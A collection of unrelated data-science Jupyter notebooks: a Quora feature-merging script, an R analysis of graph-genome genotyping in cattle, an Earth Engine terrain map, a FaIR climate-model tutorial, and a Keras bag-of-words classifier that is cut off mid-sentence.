pd.read_csv(src + 'test_textacy_similarity_feats.csv') new_feats = pd.concat([test_c, gr_feats, network_feats, textacy1_feats, turkewitz_feats], axis = 1) new_feats['q1_deg_by_freq'] = new_feats.groupby(['q1_freq'])['q1_degrees'].transform('mean') new_feats['q2_deg_by_freq'] = new_feats.groupby(['q2_freq'])['q2_degrees'].transform('mean') new_feats['q1_deg_by_freq2'] = new_feats.groupby(['q1_freq'])['q2_degrees'].transform('mean') new_feats['q2_deg_by_freq1'] = new_feats.groupby(['q2_freq'])['q1_degrees'].transform('mean') new_feats['q1_clust_by_freq'] = new_feats.groupby(['q1_freq'])['q1_cluster'].transform('mean') new_feats['q2_clust_by_freq'] = new_feats.groupby(['q2_freq'])['q2_cluster'].transform('mean') new_feats['q1_clust_by_freq2'] = new_feats.groupby(['q1_freq'])['q2_cluster'].transform('mean') new_feats['q2_clust_by_freq1'] = new_feats.groupby(['q2_freq'])['q1_cluster'].transform('mean') new_feats['q1_deg_by_freq_inv'] = new_feats.groupby(['q1_degrees'])['q1_freq'].transform('mean') new_feats['q2_deg_by_freq_inv'] = new_feats.groupby(['q2_degrees'])['q2_freq'].transform('mean') new_feats['q1_deg_by_freq2_inv'] = new_feats.groupby(['q2_degrees'])['q1_freq'].transform('mean') new_feats['q2_deg_by_freq1_inv'] = new_feats.groupby(['q1_degrees'])['q2_freq'].transform('mean') new_feats['q1_clust_by_freq_inv'] = new_feats.groupby(['q1_cluster'])['q1_freq'].transform('mean') new_feats['q2_clust_by_freq_inv'] = new_feats.groupby(['q2_cluster'])['q2_freq'].transform('mean') new_feats['q1_clust_by_freq2_inv'] = new_feats.groupby(['q2_cluster'])['q1_freq'].transform('mean') new_feats['q2_clust_by_freq1_inv'] = new_feats.groupby(['q1_cluster'])['q2_freq'].transform('mean') new_feats.drop(turkewitz_feats.columns.tolist(), axis = 1, inplace = True) del test_c, gr_feats, network_feats, textacy1_feats, turkewitz_feats gc.collect() return new_feats src = '/media/w/1c392724-ecf3-4615-8f3c-79368ec36380/DS Projects/Kaggle/Quora/scripts/features/' X_test = get_test() new_feats = get_new_feats() networks_tony = pd.read_pickle(src + 'test_fullnetworkfeatsTony.pkl') networks_weighted = pd.read_pickle(src + 'test_networkfeats_weighted.pkl') col_dict = { 'q1_cluster': 'q1_cluster_tony', 'q1_degrees': 'q1_degrees_tony', 'q1_squared_cluster': 'q1_squared_cluster_tony', 'q1_triangles_cluster': 'q1_triangles_cluster_tony', 'q2_cluster': 'q2_cluster_tony', 'q2_degrees': 'q2_degrees_tony', 'q2_squared_cluster': 'q2_squared_cluster_tony', 'q2_triangles_cluster': 'q2_triangles_cluster_tony' } networks_tony.rename(columns = col_dict, inplace = True) cv_svd50_dist = pd.read_csv(src + 'test_SVD_CV1gram_50dim.csv') cv_lsa50_dist = pd.read_csv(src + 'test_LSA_CV1gram_50dim.csv') tfidf_svd50_dist = pd.read_csv(src + 'test_SVD_TFIDF_3grams_words_50dim.csv') tfidf_lsa50_dist = pd.read_csv(src + 'test_LSA_TFIDF_3grams_words_50dim.csv') d2v_pre = pd.read_csv(src + 'test_doc2vec_pretrained_distances.csv') d2v_quora = pd.read_csv(src + 'test_doc2vec_quoratrain_distances.csv') transforms = pd.read_csv(src + 'test_SVDLSA_CV1gram_distances.csv') X_test = pd.concat([X_test, new_feats, networks_tony, networks_weighted, cv_svd50_dist, cv_lsa50_dist, tfidf_svd50_dist, tfidf_lsa50_dist, d2v_pre, d2v_quora, transforms], axis = 1) cols_to_drop = ['counts_max_network_weighted', 'counts_min_network_weighted', 'diff_counts_network_weighted', 'diff_degrees_network_weighted', 'diff_triangles_cluster_network_weighted', 'exactly_same', 'jaccard_distance_test_LSA_TFIDF_3grams_words_50dim', 'max_degrees_network_weighted', 'max_triangles_cluster_network_weighted', 'min_degrees_network_weighted', 'min_triangles_cluster_network_weighted', 'mult_counts_network_weighted', 'q1_counts_network_weighted', 'q1_degrees_network_weighted', 'q1_triangles_cluster_network_weighted', 'q2_counts_network_weighted', 'q2_degrees_network_weighted', 'q2_triangles_cluster_network_weighted', 'question1_100', 'question1_101', 'question1_102', 'question1_103', 'question1_104', 'question1_105', 'question1_106', 'question1_107', 'question1_108', 'question1_109', 'question1_110', 'question1_111', 'question1_112', 'question1_113', 'question1_114', 'question1_115', 'question1_116', 'question1_117', 'question1_118', 'question1_119', 'question1_120', 'question1_121', 'question1_122', 'question1_123', 'question1_124', 'question1_125', 'question1_126', 'question1_127', 'question1_68', 'question1_69', 'question1_70', 'question1_71', 'question1_72', 'question1_73', 'question1_74', 'question1_75', 'question1_76', 'question1_77', 'question1_78', 'question1_79', 'question1_80', 'question1_81', 'question1_82', 'question1_83', 'question1_84', 'question1_85', 'question1_86', 'question1_87', 'question1_88', 'question1_89', 'question1_90', 'question1_91', 'question1_92', 'question1_93', 'question1_94', 'question1_95', 'question1_96', 'question1_97', 'question1_98', 'question1_99', 'question2_103', 'question2_104', 'question2_106', 'question2_108', 'question2_109', 'question2_110', 'question2_112', 'question2_113', 'question2_114', 'question2_115', 'question2_116', 'question2_118', 'question2_119', 'question2_120', 'question2_121', 'question2_122', 'question2_123', 'question2_126', 'question2_127', 'question2_81', 'question2_83', 'question2_87', 'question2_88', 'question2_89', 'question2_96', 'sum_counts_network_weighted', 'sum_degrees_network_weighted', 'sum_triangles_cluster_network_weighted'] X_test.drop(cols_to_drop, axis = 1, inplace = True) X_test = X_test.astype('float32') print('Final shape:', X_test.shape) X_test.to_pickle('Xtest_916cols.pkl') del new_feats, networks_tony, networks_weighted, cv_svd50_dist, cv_lsa50_dist, \ tfidf_svd50_dist, tfidf_lsa50_dist, d2v_pre, d2v_quora, transforms gc.collect() X_test = pd.read_pickle('Xtest_500bestCols.pkl') predict_test(X_test, 'XGB_new_NetworkFeats_experiments_500feats') ```
github_jupyter
### Part4 Variant genotyping from whole genome graphs In this part, we constructed whole genome graphs for Brown Swiss population, by augmenting ~14.1 M autosomal variants identified from 82 Brown Swiss to the Bovine UCD1.2 Hereford reference. We then mapped 10 samples (not used for simulation) to this whole genome graph. We then compared with mapping with linear genome using bwa or vg (empty graphs, only backbone without variations). ``` library(tidyverse) library(magrittr) ``` ### Comparison between unique and perfect mapping Since reads were not simulated, we could not assess the mapping correctnes. Then, we followed previous approach in Novak et al. (2017), Prit et al. (2018) to calculate the reads that map perfectly (edit distance 0 without clipping) and reads that map uniquely, meaning that there is only single map location, or considerably high MQ (MQ=60) in case of multi-mapping ``` datunper <- read.table("../result/datuniqperf.tsv",header=TRUE) head(datunper) #since the data is per chromosome, then we combined across datunper_sum <- datunper %>% group_by(anims,mapper) %>% summarise(perfect=sum(perfect)*100/sum(mapped), uniq=sum(uniq)*100/sum(mapped)) options(repr.plot.width=8, repr.plot.height=8) datunper_sum %<>% mutate(Mapping=case_when(mapper=="bwa"~"Linear (BWA)", mapper=="vg_linear"~"Linear (VG)", mapper=="vg_graph"~ "Graph (VG)")) ggplot(datunper_sum,aes(x=uniq,y=perfect,col=Mapping,shape=Mapping)) + geom_point(size=5,stroke=1)+ scale_color_manual(values=c("#E69F00", "#56B4E9", "#009E73"))+ scale_shape_manual(values=c(1,2,3))+ theme_bw()+ labs(x="Unique alignment (%)",y="Perfect alignment (%)",fill="Alignment")+ coord_cartesian(xlim = c(80,85))+ theme(text=element_text(size=18), axis.title = element_text(face="bold"), legend.position = "bottom") ``` ### Quantify the difference across mapping scenarios ``` ## The largest improvement is in the perfect mapping to the paths in the graphs ## We need to quantify this datperf <- datunper_sum %>% select(anims,perfect,mapper) %>% pivot_wider(names_from = mapper,values_from = perfect) %>% mutate(dif=vg_graph-bwa) cat("Maximum improvement in perfect mapping in the graph alignment from linear BWA") max(datperf$dif) cat("Minimum improvement in perfect mapping in the graph alignment from linear BWA") min(datperf$dif) cat("Mean improvement in perfect mapping in the graph alignment from linear BWA") mean(datperf$dif) ## However we noticed that the unique mapping is decreased (but very small) in graph alignments datuniq <- datunper_sum %>% select(anims,uniq,mapper) %>% pivot_wider(names_from = mapper,values_from = uniq) %>% mutate(dif=vg_graph-bwa) cat("Minimum decreased in uniq mapping in the graph alignment from linear BWA") max(datuniq$dif) cat("Maximum decreased in uniq mapping in the graph alignment from linear BWA") min(datuniq$dif) cat("Mean decreased in uniq mapping in the graph alignment from linear BWA") mean(datuniq$dif) ``` ### Comparison of the genotypes discovered from linear vs graph alignments We then surjected the graph alignment to the corresponding linear coordinates. We then used the samtools multi-sample calling to call variants. Finally, we compared with the matched SNP array to calculate concordance statistics as below. ![Concordance statistics](concor_stat.png) ``` ## Statistics of concordance for samtools ## Mode indicate the mapping mode, bwa, graph, or vg(linear) ## Fil indicate the filtered or raw genotypes datsam <- read.table("../result/samtools_concordance_all.tsv",header=TRUE) %>% select(-prog) head(datsam) ## Since the statistics calculated based on each animals, ## We take mean and sd to report the performance of each caller datsam %>% group_by(mode) %>% summarise(m_concor=mean(concor), sd_concor=sd(concor), m_recall=mean(recal), sd_recall=sd(recal), m_discre=mean(discre), sd_discre=sd(discre), m_precision=mean(precision), sd_precision=sd(precision)) %>% as.data.frame() ``` Almost no difference among tools, we can plot it to see the pattern more clear ### Plot of the genotype concordance across sequencing depth We test whether there is any difference across sequencing coverage between graphs and linear alignment. ``` options(warn=-1) datcov <- read.table("../result/anims_coverage.tsv",header=FALSE) colnames(datcov) <- c("anims","coverage") datsamall <- datsam %>% left_join(datcov,by=c("anims")) head(datsamall) datfil <- datsamall %>% filter(! str_detect(mode,"_fil")) datfil %<>% mutate(Mapping=case_when(mode=="bwa"~"Linear(BWA)", mode=="graph"~"Graph(VG)", mode=="linear"~"Linear(VG)")) ggplot(datfil,aes(x=as.double(as.character(coverage)),y=concor,col=Mapping,shape=Mapping))+ geom_point(size=5,stroke=1)+ scale_y_continuous(breaks=seq(90,100,1),limits = c(96,100))+ scale_colour_manual(values=c("#E69F00", "#56B4E9", "#009E73","red"))+ scale_shape_manual(values=c(1,2,3))+ theme_bw()+ theme(text = element_text(size=18), axis.title=element_text(face="bold"), legend.position = "bottom")+ labs(x="Sequencing coverage",y="Genotype concordance") ``` ### Plot relation between precision and recall of the array genotypes We see no noticeable difference across sequencing coverage. We could also look into the relation between precision-recall in different samples. ``` ggplot(datfil,aes(x=precision,y=recal,shape=Mapping,col=Mapping))+ geom_point(size=5,stroke=1)+ theme_bw()+ theme(legend.position = "bottom", text = element_text(size=18), axis.title=element_text(face="bold"))+ scale_colour_manual(values=c("#E69F00", "#56B4E9", "#009E73"))+ scale_shape_manual(values=c(1,2,3))+ labs(x="Precision(%)",y="Recall(%)") ``` ### Genotyping concordance for variants discovered from GATK and Graphtyper We additionally discover and genotype variants using GATK and Graphtyper using pipeline we established in our previius paper. We want to see whether we see any difference using different variant callers. ``` datgatk <- read.table("../result/gatk4_concordance_all.tsv",header=TRUE) %>% select(-prog) head(datgatk) datgatk %>% group_by(mode) %>% summarise(m_concor=mean(concor), sd_concor=sd(concor), m_recall=mean(recal), sd_recall=sd(recal), m_discre=mean(discre), sd_discre=sd(discre), m_precision=mean(precision), sd_precision=sd(precision)) %>% as.data.frame() ``` Again we see small difference, even the concordance in graph alignments become slightly lower, when variants called with GATK. How're about genotypes from Graphtyper? ``` datgraph <- read.table("../result/graphtyper_concordance_all.tsv",header=TRUE) head(datgraph) datgraph %>% group_by(mode,prog) %>% summarise(m_concor=mean(concor), sd_concor=sd(concor), m_recall=mean(recal), sd_recall=sd(recal), m_discre=mean(discre), sd_discre=sd(discre), m_precision=mean(precision), sd_precision=sd(precision)) %>% as.data.frame() ``` Again we also see the same pattern, interestingly we observed that concordance from *Graphtyper* is higher than from *Samtools* or *GATK*. ``` sessionInfo() ```
github_jupyter
<table class="ee-notebook-buttons" align="left"> <td><a target="_blank" href="https://github.com/giswqs/earthengine-py-notebooks/tree/master/Gena/hillshade_and_water.ipynb"><img width=32px src="https://www.tensorflow.org/images/GitHub-Mark-32px.png" /> View source on GitHub</a></td> <td><a target="_blank" href="https://nbviewer.jupyter.org/github/giswqs/earthengine-py-notebooks/blob/master/Gena/hillshade_and_water.ipynb"><img width=26px src="https://upload.wikimedia.org/wikipedia/commons/thumb/3/38/Jupyter_logo.svg/883px-Jupyter_logo.svg.png" />Notebook Viewer</a></td> <td><a target="_blank" href="https://mybinder.org/v2/gh/giswqs/earthengine-py-notebooks/master?filepath=Gena/hillshade_and_water.ipynb"><img width=58px src="https://mybinder.org/static/images/logo_social.png" />Run in binder</a></td> <td><a target="_blank" href="https://colab.research.google.com/github/giswqs/earthengine-py-notebooks/blob/master/Gena/hillshade_and_water.ipynb"><img src="https://www.tensorflow.org/images/colab_logo_32px.png" /> Run in Google Colab</a></td> </table> ## Install Earth Engine API Install the [Earth Engine Python API](https://developers.google.com/earth-engine/python_install) and [geehydro](https://github.com/giswqs/geehydro). The **geehydro** Python package builds on the [folium](https://github.com/python-visualization/folium) package and implements several methods for displaying Earth Engine data layers, such as `Map.addLayer()`, `Map.setCenter()`, `Map.centerObject()`, and `Map.setOptions()`. The magic command `%%capture` can be used to hide output from a specific cell. ``` # %%capture # !pip install earthengine-api # !pip install geehydro ``` Import libraries ``` import ee import folium import geehydro ``` Authenticate and initialize Earth Engine API. You only need to authenticate the Earth Engine API once. Uncomment the line `ee.Authenticate()` if you are running this notebook for this first time or if you are getting an authentication error. ``` # ee.Authenticate() ee.Initialize() ``` ## Create an interactive map This step creates an interactive map using [folium](https://github.com/python-visualization/folium). The default basemap is the OpenStreetMap. Additional basemaps can be added using the `Map.setOptions()` function. The optional basemaps can be `ROADMAP`, `SATELLITE`, `HYBRID`, `TERRAIN`, or `ESRI`. ``` Map = folium.Map(location=[40, -100], zoom_start=4) Map.setOptions('HYBRID') ``` ## Add Earth Engine Python script ``` from ee_plugin.contrib import palettes dem = ee.Image("JAXA/ALOS/AW3D30_V1_1").select('MED') dem = dem.updateMask(dem.gt(0)) palette = palettes.cb['Pastel1'][7] #palette = ['black', 'white'] rgb = dem.visualize(**{'min': 0, 'max': 5000, 'palette': palette }) hsv = rgb.unitScale(0, 255).rgbToHsv() extrusion = 30 weight = 0.7 hs = ee.Terrain.hillshade(dem.multiply(extrusion), 315, 35).unitScale(10, 250).resample('bicubic') hs = hs.multiply(weight).add(hsv.select('value').multiply(1 - weight)) hsv = hsv.addBands(hs.rename('value'), ['value'], True) rgb = hsv.hsvToRgb() Map.addLayer(rgb, {}, 'ALOS DEM', True, 0.5) water_occurrence = ( ee.Image("JRC/GSW1_0/GlobalSurfaceWater") .select('occurrence') .divide(100) .unmask(0) .resample('bicubic') ) palette = ["ffffcc","ffeda0","fed976","feb24c","fd8d3c","fc4e2a","e31a1c","bd0026","800026"][::-1][1:] land = ee.Image("users/gena/land_polygons_image").mask() Map.addLayer(water_occurrence.mask(water_occurrence.multiply(2).multiply(land)), {'min': 0, 'max': 1, 'palette': palette}, 'water occurrence', True) ``` ## Display Earth Engine data layers ``` Map.setControlVisibility(layerControl=True, fullscreenControl=True, latLngPopup=True) Map ```
github_jupyter
# FaIR This notebook gives some simple examples of how to run and use the Finite Amplitude Impulse Response (FaIR) model. The Finite Amplitude Impulse Response (FaIR) model is a simple emissions-based climate model. It allows the user to input emissions of greenhouse gases and short lived climate forcers in order to estimate global mean atmospheric GHG concentrations, radiative forcing and temperature anomalies. The original FaIR model (v1.0) was developed to simulate the earth system response to CO$_2$ emissions, with all non-CO$_2$ forcing implemented as an "external" source. It was developed by Richard Millar, Zebedee Nicholls, Pierre Friedlingstein and Myles Allen. The motivation for developing it and its formulation is documented in a paper published in Atmospheric Chemistry and Physics in 2017 (doi:10.5194/acp-2016-405). The emissions-based model extends FaIR by replacing all sources of non-CO$_2$ forcing with relationships that are based on the source emissions, with the exception of natural forcings (viz. variations in solar irradiance and volcanic eruptions). It is useful for assessing future policy commitments to anthropogenic emissions (something which we can control) than to radiative forcing (something which is less certain and which we can only partially control). The emissions based model was developed by Chris Smith with input from Piers Forster, Leighton Regayre and Giovanni Passerello, in parallel with Nicolas Leach, Richard Millar and Myles Allen. ``` %matplotlib inline import fair import numpy as np from matplotlib import pyplot as plt plt.style.use('seaborn-darkgrid') plt.rcParams['figure.figsize'] = (16, 9) ``` ## Basic run Here we show how FaIR can be run with step change CO$_2$ emissions and sinusoidal non-CO$_2$ forcing timeseries. ``` emissions = np.zeros(250) emissions[125:] = 10.0 other_rf = np.zeros(emissions.size) for x in range(0, emissions.size): other_rf[x] = 0.5 * np.sin(2 * np.pi * (x) / 14.0) C,F,T = fair.forward.fair_scm( emissions=emissions, other_rf=other_rf, useMultigas=False ) fig = plt.figure() ax1 = fig.add_subplot(221) ax1.plot(range(0, emissions.size), emissions, color='black') ax1.set_ylabel('Emissions (GtC)') ax2 = fig.add_subplot(222) ax2.plot(range(0, emissions.size), C, color='blue') ax2.set_ylabel('CO$_2$ concentrations (ppm)') ax3 = fig.add_subplot(223) ax3.plot(range(0, emissions.size), other_rf, color='orange') ax3.set_ylabel('Other radiative forcing (W.m$^{-2}$)') ax4 = fig.add_subplot(224) ax4.plot(range(0, emissions.size), T, color='red') ax4.set_ylabel('Temperature anomaly (K)'); ``` ## RCPs We can run FaIR with the CO$_2$ emissions and non-CO$_2$ forcing from the four representative concentration pathway scenarios. To use the emissions-based version specify ```useMultigas=True``` in the call to ```fair_scm()```. By default in multi-gas mode, volcanic and solar forcing plus natural emissions of methane and nitrous oxide are switched on. ``` from fair.RCPs import rcp3pd, rcp45, rcp6, rcp85 fig = plt.figure() ax1 = fig.add_subplot(221) ax2 = fig.add_subplot(222) ax3 = fig.add_subplot(223) ax4 = fig.add_subplot(224) C26, F26, T26 = fair.forward.fair_scm(emissions=rcp3pd.Emissions.emissions) ax1.plot(rcp3pd.Emissions.year, rcp3pd.Emissions.co2_fossil, color='green', label='RCP3PD') ax2.plot(rcp3pd.Emissions.year, C26[:, 0], color='green') ax3.plot(rcp3pd.Emissions.year, np.sum(F26, axis=1), color='green') ax4.plot(rcp3pd.Emissions.year, T26, color='green') C45, F45, T45 = fair.forward.fair_scm(emissions=rcp45.Emissions.emissions) ax1.plot(rcp45.Emissions.year, rcp45.Emissions.co2_fossil, color='blue', label='RCP4.5') ax2.plot(rcp45.Emissions.year, C45[:, 0], color='blue') ax3.plot(rcp45.Emissions.year, np.sum(F45, axis=1), color='blue') ax4.plot(rcp45.Emissions.year, T45, color='blue') C60, F60, T60 = fair.forward.fair_scm(emissions=rcp6.Emissions.emissions) ax1.plot(rcp6.Emissions.year, rcp6.Emissions.co2_fossil, color='red', label='RCP6') ax2.plot(rcp6.Emissions.year, C60[:, 0], color='red') ax3.plot(rcp6.Emissions.year, np.sum(F60, axis=1), color='red') ax4.plot(rcp6.Emissions.year, T60, color='red') C85, F85, T85 = fair.forward.fair_scm(emissions=rcp85.Emissions.emissions) ax1.plot(rcp85.Emissions.year, rcp85.Emissions.co2_fossil, color='black', label='RCP8.5') ax2.plot(rcp85.Emissions.year, C85[:, 0], color='black') ax3.plot(rcp85.Emissions.year, np.sum(F85, axis=1), color='black') ax4.plot(rcp85.Emissions.year, T85, color='black') ax1.set_ylabel('Fossil CO$_2$ Emissions (GtC)') ax1.legend() ax2.set_ylabel('CO$_2$ concentrations (ppm)') ax3.set_ylabel('Total radiative forcing (W.m$^{-2}$)') ax4.set_ylabel('Temperature anomaly (K)'); ``` ## Concentrations of well-mixed greenhouse gases The output of FaIR (in most cases) is a 3-element tuple of concentrations, effective radiative forcing and temperature change since pre-industrial. Concentrations are a 31-column array of greenhouse gases. The indices correspond to the order given in the RCP concentration datasets (table 2 in Smith et al., https://www.geosci-model-dev-discuss.net/gmd-2017-266/). We can investigate the GHG concentrations coming out of the model: ``` fig = plt.figure() ax1 = fig.add_subplot(221) ax2 = fig.add_subplot(222) ax3 = fig.add_subplot(223) ax4 = fig.add_subplot(224) ax1.plot(rcp3pd.Emissions.year, C26[:,1], color='green', label='RCP3PD') ax1.plot(rcp45.Emissions.year, C45[:,1], color='blue', label='RCP4.5') ax1.plot(rcp6.Emissions.year, C60[:,1], color='red', label='RCP6') ax1.plot(rcp85.Emissions.year, C85[:,1], color='black', label='RCP8.5') ax1.set_title("Methane concentrations, ppb") ax2.plot(rcp3pd.Emissions.year, C26[:,2], color='green', label='RCP3PD') ax2.plot(rcp45.Emissions.year, C45[:,2], color='blue', label='RCP4.5') ax2.plot(rcp6.Emissions.year, C60[:,2], color='red', label='RCP6') ax2.plot(rcp85.Emissions.year, C85[:,2], color='black', label='RCP8.5') ax2.set_title("Nitrous oxide concentrations, ppb") # How to convert the H and F gases to single-species equivalents? Weight by radiative efficiency. from fair.constants import radeff C26_hfc134a_eq = np.sum(C26[:,3:15]*radeff.aslist[3:15],axis=1)/radeff.HFC134A # indices 3:15 are HFCs and PFCs C45_hfc134a_eq = np.sum(C45[:,3:15]*radeff.aslist[3:15],axis=1)/radeff.HFC134A C60_hfc134a_eq = np.sum(C60[:,3:15]*radeff.aslist[3:15],axis=1)/radeff.HFC134A C85_hfc134a_eq = np.sum(C85[:,3:15]*radeff.aslist[3:15],axis=1)/radeff.HFC134A C26_cfc12_eq = np.sum(C26[:,15:31]*radeff.aslist[15:31],axis=1)/radeff.CFC12 # indices 15:31 are ozone depleters C45_cfc12_eq = np.sum(C45[:,15:31]*radeff.aslist[15:31],axis=1)/radeff.CFC12 C60_cfc12_eq = np.sum(C60[:,15:31]*radeff.aslist[15:31],axis=1)/radeff.CFC12 C85_cfc12_eq = np.sum(C85[:,15:31]*radeff.aslist[15:31],axis=1)/radeff.CFC12 ax3.plot(rcp3pd.Emissions.year, C26_hfc134a_eq, color='green', label='RCP3PD') ax3.plot(rcp45.Emissions.year, C45_hfc134a_eq, color='blue', label='RCP4.5') ax3.plot(rcp6.Emissions.year, C60_hfc134a_eq, color='red', label='RCP6') ax3.plot(rcp85.Emissions.year, C85_hfc134a_eq, color='black', label='RCP8.5') ax3.set_title("HFC134a equivalent concentrations, ppt") ax4.plot(rcp3pd.Emissions.year, C26_cfc12_eq, color='green', label='RCP3PD') ax4.plot(rcp45.Emissions.year, C45_cfc12_eq, color='blue', label='RCP4.5') ax4.plot(rcp6.Emissions.year, C60_cfc12_eq, color='red', label='RCP6') ax4.plot(rcp85.Emissions.year, C85_cfc12_eq, color='black', label='RCP8.5') ax4.set_title("CFC12 equivalent concentrations, ppt") ax1.legend() ``` ## Radiative forcing We consider 13 separate species of radiative forcing: CO$_2$, CH$_4$, N$_2$O, minor GHGs, tropospheric ozone, stratospheric ozone, stratospheric water vapour from methane oxidation, contrails, aerosols, black carbon on snow, land use change, volcanic and solar (table 3 in Smith et al., https://www.geosci-model-dev.net/11/2273/2018/gmd-11-2273-2018.pdf). Here we show some of the more interesting examples. ``` fig = plt.figure() ax1 = fig.add_subplot(221) ax2 = fig.add_subplot(222) ax3 = fig.add_subplot(223) ax4 = fig.add_subplot(224) ax1.plot(rcp3pd.Emissions.year, F26[:,4], color='green', label='RCP3PD') ax1.plot(rcp45.Emissions.year, F45[:,4], color='blue', label='RCP4.5') ax1.plot(rcp6.Emissions.year, F60[:,4], color='red', label='RCP6') ax1.plot(rcp85.Emissions.year, F85[:,4], color='black', label='RCP8.5') ax1.set_title("Tropospheric ozone forcing, W m$^{-2}$") ax2.plot(rcp3pd.Emissions.year, F26[:,5], color='green', label='RCP3PD') ax2.plot(rcp45.Emissions.year, F45[:,5], color='blue', label='RCP4.5') ax2.plot(rcp6.Emissions.year, F60[:,5], color='red', label='RCP6') ax2.plot(rcp85.Emissions.year, F85[:,5], color='black', label='RCP8.5') ax2.set_title("Stratospheric ozone forcing, W m$^{-2}$") ax3.plot(rcp3pd.Emissions.year, F26[:,8], color='green', label='RCP3PD') ax3.plot(rcp45.Emissions.year, F45[:,8], color='blue', label='RCP4.5') ax3.plot(rcp6.Emissions.year, F60[:,8], color='red', label='RCP6') ax3.plot(rcp85.Emissions.year, F85[:,8], color='black', label='RCP8.5') ax3.set_title("Aerosol forcing, W ~m$^{-2}$") ax4.plot(rcp3pd.Emissions.year, F26[:,10], color='green', label='RCP3PD') ax4.plot(rcp45.Emissions.year, F45[:,10], color='blue', label='RCP4.5') ax4.plot(rcp6.Emissions.year, F60[:,10], color='red', label='RCP6') ax4.plot(rcp85.Emissions.year, F85[:,10], color='black', label='RCP8.5') ax4.set_title("Land use forcing, W m$^{-2}$") ax1.legend(); ``` ## Ensemble generation An advantage of FaIR is that it is very quick to run (much less than a second on an average machine). Therefore it can be used to generate probabilistic future ensembles. We'll show a 100-member ensemble. ``` from scipy import stats from fair.tools.ensemble import tcrecs_generate # generate some joint lognormal TCR and ECS pairs tcrecs = tcrecs_generate(n=100, seed=38571) # generate some forcing scale factors with SD of 10% of the best estimate F_scale = stats.norm.rvs(size=(100,13), loc=1, scale=0.1, random_state=40000) # do the same for the carbon cycle parameters r0 = stats.norm.rvs(size=100, loc=35, scale=3.5, random_state=41000) rc = stats.norm.rvs(size=100, loc=0.019, scale=0.0019, random_state=42000) rt = stats.norm.rvs(size=100, loc=4.165, scale=0.4165, random_state=45000) T = np.zeros((736,100)) %%time for i in range(100): _, _, T[:,i] = fair.forward.fair_scm(emissions=rcp85.Emissions.emissions, r0 = r0[i], rc = rc[i], rt = rt[i], tcrecs = tcrecs[i,:], scale = F_scale[i,:], F2x = 3.74*F_scale[i,0]) # scale F2x with the CO2 scaling factor for consistency fig = plt.figure() ax1 = fig.add_subplot(111) ax1.plot(rcp85.Emissions.year, T); ``` The resulting projections show a large spread. Some of these ensemble members are unrealistic, ranging from around 0.4 to 2.0 K temperature change in the present day, whereas we know in reality it is more like 0.9 (plus or minus 0.2). Therefore we can constrain this ensemble to observations. ``` try: # For Python 3.0 and later from urllib.request import urlopen except ImportError: # Fall back to Python 2's urllib2 from urllib2 import urlopen from fair.tools.constrain import hist_temp # load up Cowtan and Way data remotely url = 'http://www-users.york.ac.uk/~kdc3/papers/coverage2013/had4_krig_annual_v2_0_0.txt' response = urlopen(url) CW = np.loadtxt(response) constrained = np.zeros(100, dtype=bool) for i in range(100): # we use observed trend from 1880 to 2016 constrained[i], _, _, _, _ = hist_temp(CW[30:167,1], T[1880-1765:2017-1765,i], CW[30:167,0]) # How many ensemble members passed the constraint? print('%d ensemble members passed historical constraint' % np.sum(constrained)) # What does this do to the ensemble? fig = plt.figure() ax1 = fig.add_subplot(111) ax1.plot(rcp85.Emissions.year, T[:,constrained]); ``` Some, but not all, of the higher end scenarios have been constrained out, but there is still quite a large range of total temperature change projected for 2500 even under this constraint. From these constraints it is possible to obtain posterior distributions on effective radiative forcing, ECS, TCR, TCRE and other metrics.
github_jupyter
The datasets used here are taken from [this](https://github.com/Nilabhra/kolkata_nlp_workshop_2019) repository. ``` import pandas as pd train = pd.read_csv('https://raw.githubusercontent.com/Nilabhra/kolkata_nlp_workshop_2019/master/data/train.csv') validation = pd.read_csv('https://raw.githubusercontent.com/Nilabhra/kolkata_nlp_workshop_2019/master/data/valid.csv') test = pd.read_csv('https://raw.githubusercontent.com/Nilabhra/kolkata_nlp_workshop_2019/master/data/test.csv') train.shape, validation.shape, test.shape train.head() validation.head() test.head() train['text'].loc[0] ``` ### Removing digits for the text ``` from string import digits def remove_digits(s): remove_digits = str.maketrans('', '', digits) res = s.translate(remove_digits) return res train['text'] = train['text'].apply(remove_digits) validation['text'] = validation['text'].apply(remove_digits) ``` ### Bag of words representation ``` from sklearn.feature_extraction.text import CountVectorizer vectorizer = CountVectorizer(stop_words=None, lowercase=True, ngram_range=(1, 1), min_df=2, binary=True) train_features = vectorizer.fit_transform(train['text']) train_labels = train['class'] valid_features = vectorizer.transform(validation['text']) valid_labels = validation['class'] ``` ### Label encode the classes ``` from sklearn.preprocessing import LabelEncoder le = LabelEncoder() train_labels = le.fit_transform(train_labels) valid_labels = le.transform(valid_labels) ``` ### Model building and compilation ``` import tensorflow as tf from tensorflow import keras from tensorflow.keras.layers import Dropout, Dense model = keras.Sequential() model.add(Dropout(rate=0.2, input_shape=train_features.shape[1:])) for _ in range(2): model.add(Dense(units=64, activation='relu')) model.add(Dropout(rate=0.2)) model.add(Dense(units=1, activation='sigmoid')) model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['acc']) # Define an EarlyStopping callback es_cb = keras.callbacks.EarlyStopping(monitor='val_loss', patience=5) ``` ### We are ready to train the model and validate ``` model.fit(train_features, train_labels, epochs=15, batch_size=512, validation_data=(valid_features, valid_labels), callbacks=[es_cb], verbose=1) ``` ### How good is the model? ``` test['text'] = test['text'].apply(remove_digits) test_features = vectorizer.transform(test['text']) test_labels = le.transform(test['class']) results = model.evaluate(test_features, test_labels) print("Accuracy: {0:.2f}%".format(results[1]*100.)) ``` ### Combining the training and validation sets and retraining the model ``` data = pd.concat((train, validation), axis=0) vectorizer = CountVectorizer(stop_words=None, lowercase=True, ngram_range=(1, 1), min_df=2) features = vectorizer.fit_transform(data['text']) labels = le.fit_transform(data['class']) test_features = vectorizer.transform(test['text']) test_labels = le.transform(test['class']) model = keras.Sequential() model.add(Dropout(rate=0.2, input_shape=features.shape[1:])) model.add(Dense(units=64, activation='relu')) model.add(Dropout(rate=0.2)) model.add(Dense(units=64, activation='relu')) model.add(Dropout(rate=0.2)) model.add(Dense(units=1, activation='sigmoid')) model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['acc']) model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['acc']) model.fit(features, labels, epochs=15, batch_size=512, validation_data=(test_features, test_labels), callbacks=[es_cb], verbose=1) ``` > We will use this model for serving. ### Creating `sklearn` pipeline for deployment For this we will have to wrap the `tf-keras` model into a `scikit-learn` compatible model class. Then we can use that as a part of a `scikit-learn` pipeline. Let's start by defining a `create_model()` method which would be required for the _scikit-learn model wrapping_ part. ``` # Defined this method in 